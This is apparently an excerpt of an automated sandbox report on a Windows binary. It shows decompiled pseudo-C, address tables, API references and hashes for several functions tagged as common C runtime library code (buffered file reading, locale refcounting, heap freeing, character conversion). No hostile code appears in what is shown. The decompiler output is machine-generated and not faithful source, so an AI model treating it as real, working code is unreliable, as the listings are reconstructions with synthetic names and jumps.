                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek$AllocHeapProtectVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_ftell_malloc
                                                                                                                        • String ID: x
                                                                                                                        • API String ID: 3704003650-2363233923
                                                                                                                        • Opcode ID: f80688d7f7a5fdbd0f26746d38ef86388ce31eb9745e16a474c65b765ec3da21
                                                                                                                        • Instruction ID: 36af55cb058fdef0922aa14ec83b3c8e0932865ec605dbdd177bb15257873013
                                                                                                                        • Opcode Fuzzy Hash: f80688d7f7a5fdbd0f26746d38ef86388ce31eb9745e16a474c65b765ec3da21
                                                                                                                        • Instruction Fuzzy Hash: 012181B5E00209AFDB04DFD4C886FBFBB75BF84301F184558EA11AB281D775A985CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C51740 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00C51740(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t126;
				signed int _t132;
				signed int _t134;
				void* _t135;

				_t126 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t132 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t139 = _t121;
					if(_t121 != 0) {
						_t134 = _a20;
						__eflags = _t134;
						if(_t134 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E00C55600(_t132, _t121, _t132, _t119);
								_t135 = _t135 + 0xc;
							}
							__eflags = _t134 - _t132;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t126 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t132 = _a12 * _a16;
								__eflags =  *(_t134 + 0xc) & 0x0000010c;
								_v20 = _t132;
								_t120 = _t132;
								if(( *(_t134 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t134 + 0x18));
								}
								__eflags = _t132;
								if(_t132 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t134 + 0xc) & 0x0000010c;
										if(( *(_t134 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E00C54D5F(_t120, _t126, _t134);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t132 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00C55600(_t132, _a4, 0, _a8);
														_t135 = _t135 + 0xc;
													}
													 *((intOrPtr*)(E00C534DA(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E00C54636(_t126, _t132, _t134);
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t134 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t126 = _t55;
													_t110 = _t120;
												} else {
													_t126 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t126;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_push(E00C55549(_t126, _t132, _t134));
												_t107 = E00C5544C(_t120, _t126, _t132, _t134, __eflags);
												_t135 = _t135 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t134 + 0xc) =  *(_t134 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t134 + 0xc;
													 *_t80 =  *(_t134 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t134 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t132 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t132 = _t113;
										}
										__eflags = _t132 - _v8;
										if(_t132 > _v8) {
											_t134 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E00C55600(_t132, _a4, 0, _a8);
												_t135 = _t135 + 0xc;
											}
											_t114 = E00C534DA(__eflags);
											_push(_t134);
											_push(_t134);
											_push(_t134);
											_push(_t134);
											 *_t114 = 0x22;
											_push(_t134);
											goto L4;
										} else {
											E00C5557B(_t120, _t126, _v12, _v8,  *_t134, _t132);
											 *(_t134 + 4) =  *(_t134 + 4) - _t132;
											 *_t134 =  *_t134 + _t132;
											_v12 = _v12 + _t132;
											_t120 = _t120 - _t132;
											_t135 = _t135 + 0x10;
											_v8 = _v8 - _t132;
											_t132 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t126 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E00C534DA(_t139);
					_push(_t132);
					_push(_t132);
					_push(_t132);
					_push(_t132);
					 *_t92 = 0x16;
					_push(_t132);
					goto L4;
				}
			}




























                                                                                                                        0x00c51740
                                                                                                                        0x00c51748
                                                                                                                        0x00c5174c
                                                                                                                        0x00c51751
                                                                                                                        0x00c51753
                                                                                                                        0x00c51756
                                                                                                                        0x00c5175c
                                                                                                                        0x00c5177f
                                                                                                                        0x00000000
                                                                                                                        0x00c51763
                                                                                                                        0x00c51763
                                                                                                                        0x00c51765
                                                                                                                        0x00c51786
                                                                                                                        0x00c51789
                                                                                                                        0x00c5178b
                                                                                                                        0x00c5179a
                                                                                                                        0x00c5179a
                                                                                                                        0x00c5179d
                                                                                                                        0x00c517a2
                                                                                                                        0x00c517a7
                                                                                                                        0x00c517a7
                                                                                                                        0x00c517aa
                                                                                                                        0x00c517ac
                                                                                                                        0x00000000
                                                                                                                        0x00c517ae
                                                                                                                        0x00c517ae
                                                                                                                        0x00c517b3
                                                                                                                        0x00c517b6
                                                                                                                        0x00c517b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c517bb
                                                                                                                        0x00c517be
                                                                                                                        0x00c517c2
                                                                                                                        0x00c517c9
                                                                                                                        0x00c517cc
                                                                                                                        0x00c517ce
                                                                                                                        0x00c517d8
                                                                                                                        0x00c517d0
                                                                                                                        0x00c517d3
                                                                                                                        0x00c517d3
                                                                                                                        0x00c517df
                                                                                                                        0x00c517e1
                                                                                                                        0x00c518d1
                                                                                                                        0x00000000
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517ee
                                                                                                                        0x00c51834
                                                                                                                        0x00c51834
                                                                                                                        0x00c51837
                                                                                                                        0x00c518a2
                                                                                                                        0x00c518a8
                                                                                                                        0x00c518ab
                                                                                                                        0x00c51936
                                                                                                                        0x00000000
                                                                                                                        0x00c5193c
                                                                                                                        0x00c518b1
                                                                                                                        0x00c518b5
                                                                                                                        0x00c51905
                                                                                                                        0x00c51905
                                                                                                                        0x00c51909
                                                                                                                        0x00c51913
                                                                                                                        0x00c51918
                                                                                                                        0x00c51918
                                                                                                                        0x00c51920
                                                                                                                        0x00c51928
                                                                                                                        0x00c51929
                                                                                                                        0x00c5192a
                                                                                                                        0x00c5192b
                                                                                                                        0x00c5192c
                                                                                                                        0x00c51777
                                                                                                                        0x00c51777
                                                                                                                        0x00000000
                                                                                                                        0x00c5177c
                                                                                                                        0x00c518ba
                                                                                                                        0x00c518bd
                                                                                                                        0x00c518c2
                                                                                                                        0x00c518c3
                                                                                                                        0x00c518c3
                                                                                                                        0x00c518c3
                                                                                                                        0x00c518c6
                                                                                                                        0x00000000
                                                                                                                        0x00c518c6
                                                                                                                        0x00c51839
                                                                                                                        0x00c5183d
                                                                                                                        0x00c5185e
                                                                                                                        0x00c51863
                                                                                                                        0x00c51865
                                                                                                                        0x00c51867
                                                                                                                        0x00c51867
                                                                                                                        0x00c5183f
                                                                                                                        0x00c51846
                                                                                                                        0x00c51848
                                                                                                                        0x00c51855
                                                                                                                        0x00c51855
                                                                                                                        0x00c51855
                                                                                                                        0x00c51858
                                                                                                                        0x00c5184a
                                                                                                                        0x00c5184c
                                                                                                                        0x00c5184f
                                                                                                                        0x00c5184f
                                                                                                                        0x00c5185a
                                                                                                                        0x00c5185a
                                                                                                                        0x00c51869
                                                                                                                        0x00c5186c
                                                                                                                        0x00000000
                                                                                                                        0x00c51872
                                                                                                                        0x00c51872
                                                                                                                        0x00c51873
                                                                                                                        0x00c5187d
                                                                                                                        0x00c5187e
                                                                                                                        0x00c51883
                                                                                                                        0x00c51886
                                                                                                                        0x00c51888
                                                                                                                        0x00c51944
                                                                                                                        0x00000000
                                                                                                                        0x00c51944
                                                                                                                        0x00c5188e
                                                                                                                        0x00c51891
                                                                                                                        0x00c51932
                                                                                                                        0x00c51932
                                                                                                                        0x00c51932
                                                                                                                        0x00c51932
                                                                                                                        0x00000000
                                                                                                                        0x00c51932
                                                                                                                        0x00c51897
                                                                                                                        0x00c5189a
                                                                                                                        0x00c5189c
                                                                                                                        0x00000000
                                                                                                                        0x00c5189c
                                                                                                                        0x00c5186c
                                                                                                                        0x00c517f0
                                                                                                                        0x00c517f3
                                                                                                                        0x00c517f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c517f7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c517fd
                                                                                                                        0x00c517ff
                                                                                                                        0x00c51801
                                                                                                                        0x00c51803
                                                                                                                        0x00c51803
                                                                                                                        0x00c51805
                                                                                                                        0x00c51808
                                                                                                                        0x00c518d9
                                                                                                                        0x00c518db
                                                                                                                        0x00c518df
                                                                                                                        0x00c518e8
                                                                                                                        0x00c518ed
                                                                                                                        0x00c518ed
                                                                                                                        0x00c518f0
                                                                                                                        0x00c518f5
                                                                                                                        0x00c518f6
                                                                                                                        0x00c518f7
                                                                                                                        0x00c518f8
                                                                                                                        0x00c518f9
                                                                                                                        0x00c518ff
                                                                                                                        0x00000000
                                                                                                                        0x00c5180e
                                                                                                                        0x00c51817
                                                                                                                        0x00c5181c
                                                                                                                        0x00c5181f
                                                                                                                        0x00c51821
                                                                                                                        0x00c51824
                                                                                                                        0x00c51826
                                                                                                                        0x00c51829
                                                                                                                        0x00c5182c
                                                                                                                        0x00c5182c
                                                                                                                        0x00c518c9
                                                                                                                        0x00c518c9
                                                                                                                        0x00c518c9
                                                                                                                        0x00000000
                                                                                                                        0x00c517e7
                                                                                                                        0x00c517e1
                                                                                                                        0x00c517ac
                                                                                                                        0x00c5178d
                                                                                                                        0x00c51792
                                                                                                                        0x00c51792
                                                                                                                        0x00c51795
                                                                                                                        0x00c51798
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c51798
                                                                                                                        0x00c51767
                                                                                                                        0x00c51767
                                                                                                                        0x00c5176c
                                                                                                                        0x00c5176d
                                                                                                                        0x00c5176e
                                                                                                                        0x00c5176f
                                                                                                                        0x00c51770
                                                                                                                        0x00c51776
                                                                                                                        0x00000000
                                                                                                                        0x00c51776

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: 81fe863a888191bf61643b689016d23a1476cfc8b2e7415981a41f86b68a027a
                                                                                                                        • Instruction ID: aed36d9fd7a0500f865a42e487300c63c2caefce38f4ce12d0a1d11b99c5096e
                                                                                                                        • Opcode Fuzzy Hash: 81fe863a888191bf61643b689016d23a1476cfc8b2e7415981a41f86b68a027a
                                                                                                                        • Instruction Fuzzy Hash: CA51E538900604EFCB209F6A884C69EBBB5EF41362F1D8269FC35521D1D7309ED8DB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C53780 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E00C53780(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xc5d4e8);
				E00C52D64(__ebx, __edi, __esi);
				_t31 = E00C54229(__ebx, _t35);
				_t15 =  *0xc5f87c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00C5226D(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xc5f780; // 0xc5f358
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0xc5f358;
								if(__eflags != 0) {
									_push(_t33);
									E00C5637D(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0xc5f780; // 0xc5f358
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xc5f780; // 0xc5f358
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00C5381B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00C52FAC(_t29, 0x20);
				}
				return E00C52DA9(_t33);
			}











                                                                                                                        0x00c53780
                                                                                                                        0x00c53780
                                                                                                                        0x00c53780
                                                                                                                        0x00c53780
                                                                                                                        0x00c53782
                                                                                                                        0x00c53787
                                                                                                                        0x00c53791
                                                                                                                        0x00c53793
                                                                                                                        0x00c5379b
                                                                                                                        0x00c537bc
                                                                                                                        0x00c537c2
                                                                                                                        0x00c537c6
                                                                                                                        0x00c537c9
                                                                                                                        0x00c537cc
                                                                                                                        0x00c537d2
                                                                                                                        0x00c537d4
                                                                                                                        0x00c537d6
                                                                                                                        0x00c537d9
                                                                                                                        0x00c537df
                                                                                                                        0x00c537e1
                                                                                                                        0x00c537e3
                                                                                                                        0x00c537e9
                                                                                                                        0x00c537eb
                                                                                                                        0x00c537ec
                                                                                                                        0x00c537f1
                                                                                                                        0x00c537e9
                                                                                                                        0x00c537e1
                                                                                                                        0x00c537f2
                                                                                                                        0x00c537f7
                                                                                                                        0x00c537fa
                                                                                                                        0x00c53800
                                                                                                                        0x00c53804
                                                                                                                        0x00c53804
                                                                                                                        0x00c5380a
                                                                                                                        0x00c53811
                                                                                                                        0x00c537a3
                                                                                                                        0x00c537a3
                                                                                                                        0x00c537a3
                                                                                                                        0x00c537a8
                                                                                                                        0x00c537ac
                                                                                                                        0x00c537b1
                                                                                                                        0x00c537b9

                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00C5378C
                                                                                                                          • Part of subcall function 00C54229: __getptd_noexit.LIBCMT ref: 00C5422C
                                                                                                                          • Part of subcall function 00C54229: __amsg_exit.LIBCMT ref: 00C54239
                                                                                                                        • __amsg_exit.LIBCMT ref: 00C537AC
                                                                                                                        • __lock.LIBCMT ref: 00C537BC
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00C537D9
                                                                                                                        • InterlockedIncrement.KERNEL32(00C5F358), ref: 00C53804
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4271482742-0
                                                                                                                        • Opcode ID: 264cc06eb06c08fd8805486faa04825a6caa79a0663df2437aaf28d39200211b
                                                                                                                        • Instruction ID: d068f196a73ff59302f00b0d9b89b3343cd1891c264d05819dbd31e1a6207c57
                                                                                                                        • Opcode Fuzzy Hash: 264cc06eb06c08fd8805486faa04825a6caa79a0663df2437aaf28d39200211b
                                                                                                                        • Instruction Fuzzy Hash: 2F01E1BDD007619BC725AB64984675D77A0FB08793F044019FC2067290CB346BC9DBDA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C5637D Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 45%
                                                                                                                        			E00C5637D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0xc5d660);
				_t8 = E00C52D64(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00C52DA9(_t8);
				}
				if( *0xc61c5c != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0xc60204, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00C534DA(_t32);
						 *_t10 = E00C53498(GetLastError());
					}
					goto L9;
				}
				E00C5226D(__ebx, __edx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00C522A0(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00C522D0();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00C563D3();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                        0x00c5637d
                                                                                                                        0x00c5637f
                                                                                                                        0x00c56384
                                                                                                                        0x00c56389
                                                                                                                        0x00c5638e
                                                                                                                        0x00c56405
                                                                                                                        0x00c5640a
                                                                                                                        0x00c5640a
                                                                                                                        0x00c56397
                                                                                                                        0x00c563dc
                                                                                                                        0x00c563dd
                                                                                                                        0x00c563e5
                                                                                                                        0x00c563eb
                                                                                                                        0x00c563ed
                                                                                                                        0x00c563ef
                                                                                                                        0x00c56402
                                                                                                                        0x00c56404
                                                                                                                        0x00000000
                                                                                                                        0x00c563ed
                                                                                                                        0x00c5639b
                                                                                                                        0x00c563a1
                                                                                                                        0x00c563a6
                                                                                                                        0x00c563ac
                                                                                                                        0x00c563b1
                                                                                                                        0x00c563b3
                                                                                                                        0x00c563b4
                                                                                                                        0x00c563b5
                                                                                                                        0x00c563bb
                                                                                                                        0x00c563bc
                                                                                                                        0x00c563c3
                                                                                                                        0x00c563cc
                                                                                                                        0x00000000
                                                                                                                        0x00c563ce
                                                                                                                        0x00c563ce
                                                                                                                        0x00000000
                                                                                                                        0x00c563ce

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00C5639B
                                                                                                                          • Part of subcall function 00C5226D: __mtinitlocknum.LIBCMT ref: 00C52283
                                                                                                                          • Part of subcall function 00C5226D: __amsg_exit.LIBCMT ref: 00C5228F
                                                                                                                          • Part of subcall function 00C5226D: EnterCriticalSection.KERNEL32(00C5101A,00C5101A,?,00C598E2,00000004,00C5D7C8,0000000C,00C56466,?,00C51029,00000000,00000000,00000000,?,00C541DB,00000001), ref: 00C52297
                                                                                                                        • ___sbh_find_block.LIBCMT ref: 00C563A6
                                                                                                                        • ___sbh_free_block.LIBCMT ref: 00C563B5
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00C5D660,0000000C,00C5224E,00000000,00C5D4A8,0000000C,00C52288,?,00C5101A,?,00C598E2,00000004,00C5D7C8,0000000C), ref: 00C563E5
                                                                                                                        • GetLastError.KERNEL32(?,00C598E2,00000004,00C5D7C8,0000000C,00C56466,?,00C51029,00000000,00000000,00000000,?,00C541DB,00000001,00000214), ref: 00C563F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714421763-0
                                                                                                                        • Opcode ID: b7e96262e716981cedf7f3a66ea89a3d19c43db6f97a4f2ad4805ad8b1cae666
                                                                                                                        • Instruction ID: e947a254faa79f0cf2e30573debe2a5207878ee3fe817a9a1b74bb53fd8c0b6f
                                                                                                                        • Opcode Fuzzy Hash: b7e96262e716981cedf7f3a66ea89a3d19c43db6f97a4f2ad4805ad8b1cae666
                                                                                                                        • Instruction Fuzzy Hash: C8017C3D800355EADB256F61DC0AB5E3BA4DF01763F604018FC106B0A1DB748AC9AA5C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C5A809 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00C5A809(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00C515DE( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00C5A08C( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00C534DA(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x75ff5003
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x75ff5003
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x75ff5003
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                        0x00c5a813
                                                                                                                        0x00c5a81a
                                                                                                                        0x00c5a831
                                                                                                                        0x00000000
                                                                                                                        0x00c5a821
                                                                                                                        0x00c5a823
                                                                                                                        0x00c5a83d
                                                                                                                        0x00c5a842
                                                                                                                        0x00c5a845
                                                                                                                        0x00c5a848
                                                                                                                        0x00c5a871
                                                                                                                        0x00c5a878
                                                                                                                        0x00c5a87a
                                                                                                                        0x00c5a8fb
                                                                                                                        0x00c5a90d
                                                                                                                        0x00c5a916
                                                                                                                        0x00c5a918
                                                                                                                        0x00c5a858
                                                                                                                        0x00c5a858
                                                                                                                        0x00c5a85b
                                                                                                                        0x00c5a85d
                                                                                                                        0x00c5a860
                                                                                                                        0x00c5a860
                                                                                                                        0x00c5a860
                                                                                                                        0x00c5a860
                                                                                                                        0x00000000
                                                                                                                        0x00c5a866
                                                                                                                        0x00c5a8da
                                                                                                                        0x00c5a8da
                                                                                                                        0x00c5a8df
                                                                                                                        0x00c5a8e5
                                                                                                                        0x00c5a8e8
                                                                                                                        0x00c5a8ea
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8f1
                                                                                                                        0x00c5a87c
                                                                                                                        0x00c5a87f
                                                                                                                        0x00c5a87f
                                                                                                                        0x00c5a885
                                                                                                                        0x00c5a888
                                                                                                                        0x00c5a8af
                                                                                                                        0x00c5a8b2
                                                                                                                        0x00c5a8b2
                                                                                                                        0x00c5a8b8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8ba
                                                                                                                        0x00c5a8bd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8bf
                                                                                                                        0x00c5a8bf
                                                                                                                        0x00c5a8bf
                                                                                                                        0x00c5a8c5
                                                                                                                        0x00c5a8c8
                                                                                                                        0x00c5a836
                                                                                                                        0x00c5a836
                                                                                                                        0x00c5a8d1
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8d1
                                                                                                                        0x00c5a88a
                                                                                                                        0x00c5a88d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a891
                                                                                                                        0x00c5a89f
